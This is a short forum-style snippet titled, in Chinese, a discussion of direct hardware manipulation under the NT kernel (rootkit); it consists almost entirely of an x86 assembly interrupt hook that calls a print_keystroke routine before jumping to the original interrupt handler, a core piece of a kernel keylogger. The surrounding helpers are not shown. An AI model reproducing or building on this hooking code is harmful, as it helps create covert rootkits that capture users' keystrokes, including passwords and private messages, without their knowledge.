[讨论]NT内核下直接硬件操控(RootKit)
__declspec(naked) my_interrupt_hook()
{
__asm
{
pushad // save all general purpose registers
pushfd // save the flags register
call print_keystroke // call function
popfd // restore the flags
popad // restore the general registers
jmp old_ISR_pointer // goto the original ISR
}
}